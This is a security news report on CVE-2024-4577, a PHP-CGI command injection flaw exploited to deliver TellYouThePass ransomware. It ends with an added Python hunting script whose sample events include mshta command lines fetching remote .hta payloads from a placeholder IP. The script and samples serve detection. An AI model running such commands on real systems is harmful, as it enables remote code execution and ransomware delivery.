PHP command injection flaw exploited to deliver ransomware (CVE-2024-4577)
An OS command injection vulnerability in Windows-based PHP (CVE-2024-4577) in CGI mode is being exploited by the TellYouThePass ransomware gang.
Imperva says the attacks started on June 8, two days after the PHP development team pushed out fixes, and one day after WatchTowr researchers published a technical analysis of the flaw and proof-of-concept exploit code.
About CVE-2024-4577
Discovered and reported by Orange Tsai, principal security researcher at Devcore, CVE-2024-4577 allows attackers to bypass the protections put in place for an older PHP-CGI vulnerability (CVE-2012-1823) by using specific character sequences, and thereby remotely execute code on vulnerable systems.
The vulnerability affects all versions of PHP installed on the Windows operating system when running in CGI (common gateway interface) mode, which is a common enough scenario.
But “even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is affected by this vulnerability, too,” the Devcore team noted.
The latter scenario is the default configuration for XAMPP (open-source PHP development environment) for Windows, so all versions of XAMPP installations on Windows are vulnerable by default, they added.
They urged users to upgrade their PHP to version 8.3.8, 8.2.20, or 8.1.29, or implement temporary mitigations.
The ransomware attack
On June 7, the Shadowserver Foundation warned about multiple IPs trying to exploit CVE-2024-4577 on internet-facing machines.
On Monday, Censys said there are about 458,800 exposed PHP instances that are potentially vulnerable, though they noted that the number of actually vulnerable ones is likely smaller.
On the same day, Imperva threat researchers shared that the TellYouThePass ransomware gang has been trying to leverage the vulnerability since June 8.
“The attackers used the known exploit for CVE-2024-4577 to execute arbitrary PHP code on the target system, leveraging the code to use the ‘system’ function to run an HTML application file hosted on an attacker-controlled web server via the mshta.exe binary. mshta.exe is a native Windows binary that can execute remote payloads, pointing to the attackers operating in a ‘living off the land’ style,” they explained.
The gang tries to install web shells and execute the ransomware.
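The process chain Imperva describes (a PHP CGI worker calling `system` to launch mshta.exe against a remote .hta) is a useful hunting signal. The following is an added example, not code from Imperva or from this article: it runs a simple parent/child check over a few constructed Sysmon-style process-creation events (the field names `ParentImage`, `Image`, `CommandLine` and the IP address are assumptions for illustration).

```python
import re
from typing import Dict, Iterable, List

# Constructed sample events in Sysmon Event ID 1 style; not real telemetry.
# The first two mirror the reported chain (php-cgi.exe -> mshta.exe fetching
# a remote .hta, directly or via cmd.exe); the last two are benign noise.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\xampp\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe http://198.51.100.7/payload.hta"},
    {"ParentImage": r"C:\xampp\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "mshta https://198.51.100.7/x.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\dev\setup.hta"},
    {"ParentImage": r"C:\xampp\php\php-cgi.exe",
     "Image": r"C:\xampp\php\php-cgi.exe",
     "CommandLine": r"php-cgi.exe index.php"},
]

# PHP executables that should never be the parent of an mshta launch
PHP_PARENTS = ("php-cgi.exe", "php.exe")
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious(event: Dict[str, str]) -> bool:
    """Flag a PHP worker spawning a command that runs mshta with a remote URL."""
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    return (parent in PHP_PARENTS
            and "mshta" in cmd.lower()
            and REMOTE_URL.search(cmd) is not None)


def find_suspicious(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return every event matching the php-cgi -> mshta remote-payload pattern."""
    return [e for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", hit["ParentImage"], "->", hit["CommandLine"])
```

On a real host the same check applies to any process tree rooted at the web server's PHP worker; a locally launched .hta from explorer.exe, as in the third sample, is deliberately not flagged.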
UPDATE (June 13, 2024, 05:20 p.m. ET):
GreyNoise has set up a tag to track in-the-wild attempts to exploit the vulnerability, and has revealed that attackers are trying to deliver a variety of malicious payloads, including a Gh0st RAT variant and Cobalt Strike beacons.